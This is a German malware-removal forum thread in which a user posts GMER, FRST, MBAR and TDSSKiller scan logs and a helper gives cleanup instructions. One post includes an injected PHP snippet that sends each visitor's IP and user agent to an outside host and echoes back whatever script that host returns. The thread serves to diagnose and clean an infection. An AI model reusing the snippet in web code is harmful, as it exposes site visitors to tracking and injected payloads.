1998-12-09 03:53 - 1998-12-09 03:53 - 0186368 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRAREG.DLL
1998-12-09 03:53 - 1998-12-09 03:53 - 0017920 _____ (Symantec Corp.) C:\Program Files\Common Files\IRASRIAL.DLL
1998-12-09 03:53 - 1998-12-09 03:53 - 0031744 _____ (Symantec Corp., Peter Norton Computing Group) C:\Program Files\Common Files\IRAWEBTR.DLL
2014-12-14 03:24 - 2014-12-14 03:24 - 0000036 _____ () C:\Users\k\AppData\Local\housecall.guid.cache

Some content of TEMP:
====================
C:\Users\k\AppData\Local\Temp\avgnt.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-03-25 00:08

==================== End Of Log ============================

--- --- ---

Code:

ATTFilter

GMER 2.1.19357 - hxxp://www.gmer.net
Rootkit scan 2015-03-26 14:09:48
Windows 6.1.7601 Service Pack 1 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 INTEL_SSDSC2BW480A4 rev.DC32 447,13GB
Running: Gmer-19357.exe; Driver: C:\Users\k\AppData\Local\Temp\pxddqpoc.sys


---- System - GMER 2.1 ----

SSDT     86BD9554                                                                                                                                                                 ZwAssignProcessToJobObject
SSDT     86BDF0F4                                                                                                                                                                 ZwCreateKey
SSDT     86BD6BFC                                                                                                                                                                 ZwCreateMutant
SSDT     86BD4064                                                                                                                                                                 ZwCreateProcess
SSDT     86BD3CF4                                                                                                                                                                 ZwCreateProcessEx
SSDT     8D853346                                                                                                                                                                 ZwCreateSection
SSDT     8D85331E                                                                                                                                                                 ZwCreateSymbolicLinkObject
SSDT     86BDE0FC                                                                                                                                                                 ZwCreateThread
SSDT     86BDE0C4                                                                                                                                                                 ZwCreateThreadEx
SSDT     86BD3CBC                                                                                                                                                                 ZwCreateUserProcess
SSDT     86BD6A74                                                                                                                                                                 ZwDebugActiveProcess
SSDT     86BDEE7C                                                                                                                                                                 ZwDeleteKey
SSDT     86BDEDD4                                                                                                                                                                 ZwDeleteValueKey
SSDT     86BD6B8C                                                                                                                                                                 ZwDuplicateObject
SSDT     86BD6B1C                                                                                                                                                                 ZwGetContextThread
SSDT     8D853323                                                                                                                                                                 ZwLoadDriver
SSDT     86BDED64                                                                                                                                                                 ZwMapViewOfSection
SSDT     86BD422C                                                                                                                                                                 ZwOpenProcess
SSDT     8D853319                                                                                                                                                                 ZwOpenSection
SSDT     86BD41F4                                                                                                                                                                 ZwOpenThread
SSDT     86BD958C                                                                                                                                                                 ZwProtectVirtualMemory
SSDT     86BDEE44                                                                                                                                                                 ZwRenameKey
SSDT     8D853350                                                                                                                                                                 ZwRequestWaitReplyPort
SSDT     86BDEE0C                                                                                                                                                                 ZwRestoreKey
SSDT     86BD6AAC                                                                                                                                                                 ZwResumeThread
SSDT     8D85334B                                                                                                                                                                 ZwSetContextThread
SSDT     8D853355                                                                                                                                                                 ZwSetSecurityObject
SSDT     8D853328                                                                                                                                                                 ZwSetSystemInformation
SSDT     86BDF0BC                                                                                                                                                                 ZwSetValueKey
SSDT     8D85335A                                                                                                                                                                 ZwSystemDebugControl
SSDT     8D8532E7                                                                                                                                                                 ZwTerminateProcess
SSDT     86BD35AC                                                                                                                                                                 ZwTerminateThread
SSDT     86BDE134                                                                                                                                                                 ZwWriteVirtualMemory

---- Kernel code sections - GMER 2.1 ----

.text    ntkrnlpa.exe!ZwRequestWaitReplyPort + 1495                                                                                                                               82C8E9E5 1 Byte  [06]
.text    ntkrnlpa.exe!KiDispatchInterrupt + 5A2                                                                                                                                   82CC8312 19 Bytes  [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}
.text    ntkrnlpa.exe!KeRemoveQueueEx + 1153                                                                                                                                      82CCF5D8 4 Bytes  [54, 95, BD, 86]
.text    ntkrnlpa.exe!KeRemoveQueueEx + 11BF                                                                                                                                      82CCF644 4 Bytes  [F4, F0, BD, 86]
.text    ntkrnlpa.exe!KeRemoveQueueEx + 11CF                                                                                                                                      82CCF654 4 Bytes  [FC, 6B, BD, 86]
.text    ntkrnlpa.exe!KeRemoveQueueEx + 11E3                                                                                                                                      82CCF668 8 Bytes  [64, 40, BD, 86, F4, 3C, BD, ...]
.text    ntkrnlpa.exe!KeRemoveQueueEx + 11F7                                                                                                                                      82CCF67C 4 Bytes  [46, 33, 85, 8D]
.text    ...                                                                                                                                                                      
?        System32\drivers\souotvyr.sys                                                                                                                                            Das System kann den angegebenen Pfad nicht finden. !

---- Devices - GMER 2.1 ----

Device                                                                                                                                                                            Ntfs.sys
Device   \Driver\kbdclass \Device\KeyboardClass0                                                                                                                                  86D52350
Device   \Driver\kbdclass \Device\KeyboardClass1                                                                                                                                  86D52350
Device                                                                                                                                                                            cdfs.sys
---- Processes - GMER 2.1 ----

Library  C:\Program Files\Trend Micro\AMSP\module\1000001\3.5.1186\3.5.1186\utilJsonHandle.dll (*** hidden *** ) @ C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe [1844]  0x59480000                                                                                                                                           

---- Registry - GMER 2.1 ----

Reg      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\System\Active                                                                                       
Reg      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\System\Active@B97433AA                                                                              53

---- Disk sectors - GMER 2.1 ----

Disk     \Device\Harddisk0\DR0                                                                                                                                                    unknown MBR code

---- EOF - GMER 2.1 ----

Code:

ATTFilter

<?php
#b617e0#
error_reporting(0); @ini_set('display_errors',0); $wp_n4545 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_n4545) && !preg_match ('/bot/i', $wp_n4545))){
$wp_n094545="hxxp://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_n4545);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_n094545); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_4545n = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_4545n = @file_get_contents($wp_n094545);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_4545n=@stream_get_contents(@fopen($wp_n094545, "r"));}}
if (substr($wp_4545n,1,3) === 'scr'){ echo $wp_4545n; }
#/b617e0#
?>

schrauber · 26.03.2015, 14:51

Hi,

Logs bitte immer in den Thread posten. Zur Not aufteilen und mehrere Posts nutzen.
Ich kann auf Arbeit keine Anhänge öffnen, danke.

So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert mir massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu gross für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

stefan87 · 26.03.2015, 15:00

Hallo Schrauber,

ok habs oben reingeladen.

Nur das Wireshark geht nicht. Die eventuell Böse ip ist: 178.237.24.191

hxxp://www.utrace.de/?query=178.237.24.191

Gruß
Stefan

schrauber · 26.03.2015, 19:33

hi,

Downloade dir bitte

Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.

Starte bitte die mbar.exe.
Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
Klicke auf den CleanUp Button und erlaube den Neustart.
Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
Nach dem Neustart starte die mbar.exe erneut.
Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.

Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers

Downloade dir bitte

TDSSKiller.exe und speichere diese Datei auf dem Desktop

Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
Drücke Start Scan
Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt

Poste den Inhalt bitte in jedem Fall hier in deinen Thread.

stefan87 · 27.03.2015, 14:29

Sieht beides soweit gut aus, hat nix gefunden.

Oder schlecht / weil ich jetzt noch nicht weiß was es war oder ist.

Code:

ATTFilter

Malwarebytes Anti-Rootkit BETA 1.09.1.1004
www.malwarebytes.org

Database version:
  main:    v2015.03.27.05
  rootkit: v2015.03.26.01

Windows 7 Service Pack 1 x86 NTFS
Internet Explorer 11.0.9600.17691
k :: K-PC [administrator]

27.03.2015 13:34:45
mbar-log-2015-03-27 (13-34-45).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 319685
Time elapsed: 7 minute(s), 57 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

Code:

ATTFilter

14:17:22.0566 0x0af0  TDSS rootkit removing tool 3.0.0.44 Jan 22 2015 08:27:04
14:17:29.0477 0x0af0  ============================================================
14:17:29.0477 0x0af0  Current date / time: 2015/03/27 14:17:29.0477
14:17:29.0477 0x0af0  SystemInfo:
14:17:29.0477 0x0af0  
14:17:29.0477 0x0af0  OS Version: 6.1.7601 ServicePack: 1.0
14:17:29.0477 0x0af0  Product type: Workstation
14:17:29.0477 0x0af0  ComputerName: K-PC
14:17:29.0477 0x0af0  UserName: k
14:17:29.0477 0x0af0  Windows directory: C:\Windows
14:17:29.0477 0x0af0  System windows directory: C:\Windows
14:17:29.0477 0x0af0  Processor architecture: Intel x86
14:17:29.0477 0x0af0  Number of processors: 4
14:17:29.0477 0x0af0  Page size: 0x1000
14:17:29.0477 0x0af0  Boot type: Normal boot
14:17:29.0477 0x0af0  ============================================================
14:17:31.0327 0x0af0  KLMD registered as C:\Windows\system32\drivers\60449279.sys
14:17:31.0737 0x0af0  System UUID: {785D16FD-329A-E977-56C8-831842E24307}
14:17:32.0787 0x0af0  Drive \Device\Harddisk0\DR0 - Size: 0x6FC86D6000 ( 447.13 Gb ), SectorSize: 0x200, Cylinders: 0x35CA4, SectorsPerTrack: 0x13, TracksPerCylinder: 0xE0, Type 'K0', Flags 0x00000050
14:17:32.0787 0x0af0  Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
14:17:32.0797 0x0af0  ============================================================
14:17:32.0797 0x0af0  \Device\Harddisk0\DR0:
14:17:32.0797 0x0af0  MBR partitions:
14:17:32.0797 0x0af0  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
14:17:32.0797 0x0af0  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0x37E10000
14:17:32.0797 0x0af0  \Device\Harddisk1\DR1:
14:17:32.0797 0x0af0  MBR partitions:
14:17:32.0797 0x0af0  \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
14:17:32.0797 0x0af0  ============================================================
14:17:32.0817 0x0af0  Initialize success
14:17:32.0817 0x0af0  ============================================================
14:17:39.0107 0x1220  ============================================================
14:17:39.0107 0x1220  Scan started
14:17:39.0107 0x1220  Mode: Manual; 
14:17:39.0107 0x1220  ============================================================
14:17:39.0107 0x1220  KSN ping started
14:17:52.0548 0x1220  KSN ping finished: true
14:17:52.0768 0x1220  ================ Scan system memory ========================
14:17:52.0768 0x1220  System memory - ok
14:17:52.0768 0x1220  ================ Scan services =============================
14:17:52.0788 0x1220  1394ohci - ok
14:17:52.0788 0x1220  ACPI - ok
14:17:52.0798 0x1220  AcpiPmi - ok
14:17:52.0798 0x1220  Adobe LM Service - ok
14:17:52.0808 0x1220  AdobeARMservice - ok
14:17:52.0818 0x1220  AdobeFlashPlayerUpdateSvc - ok
14:17:52.0828 0x1220  adp94xx - ok
14:17:52.0828 0x1220  adpahci - ok
14:17:52.0838 0x1220  adpu320 - ok
14:17:52.0838 0x1220  AeLookupSvc - ok
14:17:52.0848 0x1220  AFD - ok
14:17:52.0848 0x1220  agp440 - ok
14:17:52.0858 0x1220  aic78xx - ok
14:17:52.0858 0x1220  ALG - ok
14:17:52.0868 0x1220  aliide - ok
14:17:52.0868 0x1220  amdagp - ok
14:17:52.0878 0x1220  amdide - ok
14:17:52.0888 0x1220  AmdK8 - ok
14:17:52.0888 0x1220  AmdPPM - ok
14:17:52.0898 0x1220  amdsata - ok
14:17:52.0898 0x1220  amdsbs - ok
14:17:52.0908 0x1220  amdxata - ok
14:17:52.0908 0x1220  Amsp - ok
14:17:52.0918 0x1220  AntiVirSchedulerService - ok
14:17:52.0918 0x1220  AntiVirService - ok
14:17:52.0928 0x1220  AppID - ok
14:17:52.0928 0x1220  AppIDSvc - ok
14:17:52.0938 0x1220  Appinfo - ok
14:17:52.0938 0x1220  Apple Mobile Device - ok
14:17:52.0948 0x1220  arc - ok
14:17:52.0948 0x1220  arcsas - ok
14:17:52.0958 0x1220  aspnet_state - ok
14:17:52.0968 0x1220  AsyncMac - ok
14:17:52.0978 0x1220  atapi - ok
14:17:52.0978 0x1220  AudioEndpointBuilder - ok
14:17:52.0988 0x1220  Audiosrv - ok
14:17:52.0988 0x1220  avgntflt - ok
14:17:52.0998 0x1220  avipbb - ok
14:17:52.0998 0x1220  Avira.OE.ServiceHost - ok
14:17:53.0008 0x1220  avkmgr - ok
14:17:53.0008 0x1220  AxInstSV - ok
14:17:53.0018 0x1220  b06bdrv - ok
14:17:53.0018 0x1220  b57nd60x - ok
14:17:53.0028 0x1220  BDESVC - ok
14:17:53.0028 0x1220  Beep - ok
14:17:53.0038 0x1220  BFE - ok
14:17:53.0038 0x1220  BITS - ok
14:17:53.0048 0x1220  blbdrive - ok
14:17:53.0048 0x1220  Bonjour Service - ok
14:17:53.0058 0x1220  bowser - ok
14:17:53.0058 0x1220  BrFiltLo - ok
14:17:53.0068 0x1220  BrFiltUp - ok
14:17:53.0068 0x1220  Browser - ok
14:17:53.0078 0x1220  Brserid - ok
14:17:53.0078 0x1220  BrSerWdm - ok
14:17:53.0088 0x1220  BrUsbMdm - ok
14:17:53.0088 0x1220  BrUsbSer - ok
14:17:53.0098 0x1220  BTHMODEM - ok
14:17:53.0108 0x1220  bthserv - ok
14:17:53.0108 0x1220  cdfs - ok
14:17:53.0118 0x1220  cdrom - ok
14:17:53.0118 0x1220  CertPropSvc - ok
14:17:53.0128 0x1220  circlass - ok
14:17:53.0128 0x1220  CLCapSvc - ok
14:17:53.0138 0x1220  CLFS - ok
14:17:53.0138 0x1220  clr_optimization_v2.0.50727_32 - ok
14:17:53.0148 0x1220  clr_optimization_v4.0.30319_32 - ok
14:17:53.0158 0x1220  CLSched - ok
14:17:53.0158 0x1220  CmBatt - ok
14:17:53.0158 0x1220  cmdide - ok
14:17:53.0168 0x1220  CNG - ok
14:17:53.0168 0x1220  Compbatt - ok
14:17:53.0178 0x1220  CompositeBus - ok
14:17:53.0178 0x1220  COMSysApp - ok
14:17:53.0188 0x1220  crcdisk - ok
14:17:53.0198 0x1220  CryptSvc - ok
14:17:53.0198 0x1220  CXAVSAUD - ok
14:17:53.0208 0x1220  DcomLaunch - ok
14:17:53.0208 0x1220  defragsvc - ok
14:17:53.0218 0x1220  DfsC - ok
14:17:53.0218 0x1220  Dhcp - ok
14:17:53.0228 0x1220  discache - ok
14:17:53.0228 0x1220  Disk - ok
14:17:53.0238 0x1220  Dnscache - ok
14:17:53.0238 0x1220  dot3svc - ok
14:17:53.0248 0x1220  DPS - ok
14:17:53.0248 0x1220  drmkaud - ok
14:17:53.0258 0x1220  DXGKrnl - ok
14:17:53.0258 0x1220  EapHost - ok
14:17:53.0268 0x1220  ebdrv - ok
14:17:53.0268 0x1220  EFS - ok
14:17:53.0278 0x1220  ehRecvr - ok
14:17:53.0278 0x1220  ehSched - ok
14:17:53.0288 0x1220  elxstor - ok
14:17:53.0288 0x1220  ErrDev - ok
14:17:53.0298 0x1220  EventSystem - ok
14:17:53.0308 0x1220  exfat - ok
14:17:53.0308 0x1220  fastfat - ok
14:17:53.0318 0x1220  Fax - ok
14:17:53.0318 0x1220  fdc - ok
14:17:53.0328 0x1220  fdPHost - ok
14:17:53.0328 0x1220  FDResPub - ok
14:17:53.0338 0x1220  FileInfo - ok
14:17:53.0338 0x1220  Filetrace - ok
14:17:53.0348 0x1220  flpydisk - ok
14:17:53.0348 0x1220  FltMgr - ok
14:17:53.0358 0x1220  FontCache - ok
14:17:53.0358 0x1220  FontCache3.0.0.0 - ok
14:17:53.0368 0x1220  FsDepends - ok
14:17:53.0368 0x1220  Fs_Rec - ok
14:17:53.0378 0x1220  fvevol - ok
14:17:53.0378 0x1220  gagp30kx - ok
14:17:53.0388 0x1220  GEARAspiWDM - ok
14:17:53.0388 0x1220  gpsvc - ok
14:17:53.0398 0x1220  gupdate - ok
14:17:53.0398 0x1220  gupdatem - ok
14:17:53.0408 0x1220  HauppaugeTVServer - ok
14:17:53.0408 0x1220  hcw85cir - ok
14:17:53.0418 0x1220  hcw88bda - ok
14:17:53.0418 0x1220  hcw88rc5 - ok
14:17:53.0428 0x1220  HCW88TSE - ok
14:17:53.0428 0x1220  hcw88vid - ok
14:17:53.0438 0x1220  HdAudAddService - ok
14:17:53.0448 0x1220  HDAudBus - ok
14:17:53.0448 0x1220  HidBatt - ok
14:17:53.0458 0x1220  HidBth - ok
14:17:53.0458 0x1220  HidIr - ok
14:17:53.0468 0x1220  hidserv - ok
14:17:53.0468 0x1220  HidUsb - ok
14:17:53.0478 0x1220  hkmsvc - ok
14:17:53.0478 0x1220  HomeGroupListener - ok
14:17:53.0488 0x1220  HomeGroupProvider - ok
14:17:53.0488 0x1220  HpSAMD - ok
14:17:53.0498 0x1220  HTTP - ok
14:17:53.0498 0x1220  hwpolicy - ok
14:17:53.0508 0x1220  i8042prt - ok
14:17:53.0508 0x1220  iaStorV - ok
14:17:53.0518 0x1220  idsvc - ok
14:17:53.0528 0x1220  IEEtwCollectorService - ok
14:17:53.0528 0x1220  iirsp - ok
14:17:53.0538 0x1220  IKEEXT - ok
14:17:53.0538 0x1220  IntcAzAudAddService - ok
14:17:53.0548 0x1220  intelide - ok
14:17:53.0548 0x1220  intelppm - ok
14:17:53.0558 0x1220  IPBusEnum - ok
14:17:53.0558 0x1220  IpFilterDriver - ok
14:17:53.0568 0x1220  iphlpsvc - ok
14:17:53.0568 0x1220  IPMIDRV - ok
14:17:53.0578 0x1220  IPNAT - ok
14:17:53.0578 0x1220  iPod Service - ok
14:17:53.0588 0x1220  IRENUM - ok
14:17:53.0588 0x1220  isapnp - ok
14:17:53.0598 0x1220  iScsiPrt - ok
14:17:53.0598 0x1220  kbdclass - ok
14:17:53.0608 0x1220  kbdhid - ok
14:17:53.0608 0x1220  KeyIso - ok
14:17:53.0618 0x1220  KSecDD - ok
14:17:53.0618 0x1220  KSecPkg - ok
14:17:53.0628 0x1220  KtmRm - ok
14:17:53.0628 0x1220  L1E - ok
14:17:53.0638 0x1220  LanmanServer - ok
14:17:53.0638 0x1220  LanmanWorkstation - ok
14:17:53.0648 0x1220  lltdio - ok
14:17:53.0658 0x1220  lltdsvc - ok
14:17:53.0658 0x1220  lmhosts - ok
14:17:53.0668 0x1220  LSI_FC - ok
14:17:53.0668 0x1220  LSI_SAS - ok
14:17:53.0678 0x1220  LSI_SAS2 - ok
14:17:53.0678 0x1220  LSI_SCSI - ok
14:17:53.0688 0x1220  luafv - ok
14:17:53.0698 0x1220  MBAMProtector - ok
14:17:53.0698 0x1220  MBAMScheduler - ok
14:17:53.0708 0x1220  MBAMService - ok
14:17:53.0708 0x1220  MBAMSwissArmy - ok
14:17:53.0718 0x1220  MBAMWebAccessControl - ok
14:17:53.0718 0x1220  Mcx2Svc - ok
14:17:53.0728 0x1220  megasas - ok
14:17:53.0728 0x1220  MegaSR - ok
14:17:53.0738 0x1220  MMCSS - ok
14:17:53.0738 0x1220  Modem - ok
14:17:53.0748 0x1220  monitor - ok
14:17:53.0748 0x1220  mouclass - ok
14:17:53.0758 0x1220  mouhid - ok
14:17:53.0758 0x1220  mountmgr - ok
14:17:53.0768 0x1220  MozillaMaintenance - ok
14:17:53.0768 0x1220  mpio - ok
14:17:53.0778 0x1220  mpsdrv - ok
14:17:53.0778 0x1220  MpsSvc - ok
14:17:53.0788 0x1220  MRxDAV - ok
14:17:53.0788 0x1220  mrxsmb - ok
14:17:53.0798 0x1220  mrxsmb10 - ok
14:17:53.0798 0x1220  mrxsmb20 - ok
14:17:53.0808 0x1220  msahci - ok
14:17:53.0808 0x1220  msdsm - ok
14:17:53.0818 0x1220  MSDTC - ok
14:17:53.0828 0x1220  Msfs - ok
14:17:53.0828 0x1220  mshidkmdf - ok
14:17:53.0838 0x1220  msisadrv - ok
14:17:53.0838 0x1220  MSiSCSI - ok
14:17:53.0848 0x1220  msiserver - ok
14:17:53.0848 0x1220  MSKSSRV - ok
14:17:53.0858 0x1220  MSPCLOCK - ok
14:17:53.0858 0x1220  MSPQM - ok
14:17:53.0868 0x1220  MsRPC - ok
14:17:53.0878 0x1220  mssmbios - ok
14:17:53.0878 0x1220  MSTEE - ok
14:17:53.0888 0x1220  MTConfig - ok
14:17:53.0888 0x1220  MTsensor - ok
14:17:53.0898 0x1220  Mup - ok
14:17:53.0898 0x1220  napagent - ok
14:17:53.0908 0x1220  NativeWifiP - ok
14:17:53.0908 0x1220  NDIS - ok
14:17:53.0918 0x1220  NdisCap - ok
14:17:53.0918 0x1220  NdisTapi - ok
14:17:53.0928 0x1220  Ndisuio - ok
14:17:53.0928 0x1220  NdisWan - ok
14:17:53.0938 0x1220  NDProxy - ok
14:17:53.0938 0x1220  NetBIOS - ok
14:17:53.0948 0x1220  NetBT - ok
14:17:53.0948 0x1220  Netlogon - ok
14:17:53.0948 0x1220  Netman - ok
14:17:53.0958 0x1220  NetMsmqActivator - ok
14:17:53.0968 0x1220  NetPipeActivator - ok
14:17:53.0968 0x1220  netprofm - ok
14:17:53.0978 0x1220  NetTcpActivator - ok
14:17:53.0978 0x1220  NetTcpPortSharing - ok
14:17:53.0988 0x1220  nfrd960 - ok
14:17:53.0988 0x1220  NlaSvc - ok
14:17:53.0998 0x1220  NPF - ok
14:17:53.0998 0x1220  Npfs - ok
14:17:54.0008 0x1220  nsi - ok
14:17:54.0008 0x1220  nsiproxy - ok
14:17:54.0018 0x1220  Ntfs - ok
14:17:54.0018 0x1220  Null - ok
14:17:54.0028 0x1220  nvlddmkm - ok
14:17:54.0028 0x1220  nvraid - ok
14:17:54.0038 0x1220  nvstor - ok
14:17:54.0038 0x1220  nvsvc - ok
14:17:54.0048 0x1220  nv_agp - ok
14:17:54.0048 0x1220  ohci1394 - ok
14:17:54.0058 0x1220  ose - ok
14:17:54.0058 0x1220  p2pimsvc - ok
14:17:54.0068 0x1220  p2psvc - ok
14:17:54.0068 0x1220  Parport - ok
14:17:54.0078 0x1220  partmgr - ok
14:17:54.0078 0x1220  Parvdm - ok
14:17:54.0088 0x1220  PcaSvc - ok
14:17:54.0088 0x1220  pci - ok
14:17:54.0098 0x1220  pciide - ok
14:17:54.0098 0x1220  pcmcia - ok
14:17:54.0108 0x1220  pcw - ok
14:17:54.0108 0x1220  PDF Architect 2 Creator - ok
14:17:54.0118 0x1220  PEAUTH - ok
14:17:54.0138 0x1220  PGPdisk - ok
14:17:54.0138 0x1220  pgpfs - ok
14:17:54.0148 0x1220  PGPsdkDriver - ok
14:17:54.0148 0x1220  PGPserv - ok
14:17:54.0158 0x1220  PGPwded - ok
14:17:54.0158 0x1220  Pgpwdefs - ok
14:17:54.0168 0x1220  pla - ok
14:17:54.0168 0x1220  Platinum Host Service - ok
14:17:54.0178 0x1220  PlugPlay - ok
14:17:54.0178 0x1220  PNRPAutoReg - ok
14:17:54.0188 0x1220  PNRPsvc - ok
14:17:54.0188 0x1220  PolicyAgent - ok
14:17:54.0198 0x1220  Power - ok
14:17:54.0208 0x1220  PptpMiniport - ok
14:17:54.0208 0x1220  Processor - ok
14:17:54.0218 0x1220  ProfSvc - ok
14:17:54.0218 0x1220  ProtectedStorage - ok
14:17:54.0228 0x1220  Psched - ok
14:17:54.0228 0x1220  ql2300 - ok
14:17:54.0238 0x1220  ql40xx - ok
14:17:54.0238 0x1220  QWAVE - ok
14:17:54.0248 0x1220  QWAVEdrv - ok
14:17:54.0248 0x1220  RasAcd - ok
14:17:54.0258 0x1220  RasAgileVpn - ok
14:17:54.0258 0x1220  RasAuto - ok
14:17:54.0268 0x1220  Rasl2tp - ok
14:17:54.0268 0x1220  RasMan - ok
14:17:54.0278 0x1220  RasPppoe - ok
14:17:54.0278 0x1220  RasSstp - ok
14:17:54.0288 0x1220  rdbss - ok
14:17:54.0288 0x1220  rdpbus - ok
14:17:54.0298 0x1220  RDPCDD - ok
14:17:54.0298 0x1220  RDPENCDD - ok
14:17:54.0308 0x1220  RDPREFMP - ok
14:17:54.0318 0x1220  RdpVideoMiniport - ok
14:17:54.0318 0x1220  RDPWD - ok
14:17:54.0328 0x1220  rdyboost - ok
14:17:54.0328 0x1220  RemoteAccess - ok
14:17:54.0338 0x1220  RemoteRegistry - ok
14:17:54.0338 0x1220  RichVideo - ok
14:17:54.0348 0x1220  rpcapd - ok
14:17:54.0348 0x1220  RpcEptMapper - ok
14:17:54.0358 0x1220  RpcLocator - ok
14:17:54.0358 0x1220  RpcSs - ok
14:17:54.0368 0x1220  rspndr - ok
14:17:54.0368 0x1220  SamSs - ok
14:17:54.0378 0x1220  sbp2port - ok
14:17:54.0378 0x1220  SCardSvr - ok
14:17:54.0388 0x1220  scfilter - ok
14:17:54.0388 0x1220  Schedule - ok
14:17:54.0398 0x1220  SCPolicySvc - ok
14:17:54.0398 0x1220  SDRSVC - ok
14:17:54.0408 0x1220  secdrv - ok
14:17:54.0418 0x1220  seclogon - ok
14:17:54.0418 0x1220  SENS - ok
14:17:54.0428 0x1220  SensrSvc - ok
14:17:54.0428 0x1220  Serenum - ok
14:17:54.0438 0x1220  Serial - ok
14:17:54.0438 0x1220  sermouse - ok
14:17:54.0448 0x1220  SessionEnv - ok
14:17:54.0458 0x1220  sffdisk - ok
14:17:54.0458 0x1220  sffp_mmc - ok
14:17:54.0468 0x1220  sffp_sd - ok
14:17:54.0468 0x1220  sfloppy - ok
14:17:54.0478 0x1220  SharedAccess - ok
14:17:54.0478 0x1220  ShellHWDetection - ok
14:17:54.0488 0x1220  sisagp - ok
14:17:54.0488 0x1220  SiSRaid2 - ok
14:17:54.0498 0x1220  SiSRaid4 - ok
14:17:54.0498 0x1220  Smb - ok
14:17:54.0508 0x1220  SNMPTRAP - ok
14:17:54.0518 0x1220  spldr - ok
14:17:54.0518 0x1220  Spooler - ok
14:17:54.0528 0x1220  sppsvc - ok
14:17:54.0528 0x1220  sppuinotify - ok
14:17:54.0538 0x1220  srv - ok
14:17:54.0538 0x1220  srv2 - ok
14:17:54.0548 0x1220  srvnet - ok
14:17:54.0548 0x1220  SSDPSRV - ok
14:17:54.0558 0x1220  ssmdrv - ok
14:17:54.0558 0x1220  SstpSvc - ok
14:17:54.0568 0x1220  Stereo Service - ok
14:17:54.0568 0x1220  stexstor - ok
14:17:54.0578 0x1220  StillCam - ok
14:17:54.0578 0x1220  StiSvc - ok
14:17:54.0588 0x1220  swenum - ok
14:17:54.0588 0x1220  swprv - ok
14:17:54.0598 0x1220  SysMain - ok
14:17:54.0598 0x1220  TabletInputService - ok
14:17:54.0608 0x1220  TapiSrv - ok
14:17:54.0608 0x1220  TBS - ok
14:17:54.0618 0x1220  Tcpip - ok
14:17:54.0618 0x1220  TCPIP6 - ok
14:17:54.0628 0x1220  tcpipreg - ok
14:17:54.0638 0x1220  TDPIPE - ok
14:17:54.0638 0x1220  TDTCP - ok
14:17:54.0648 0x1220  tdx - ok
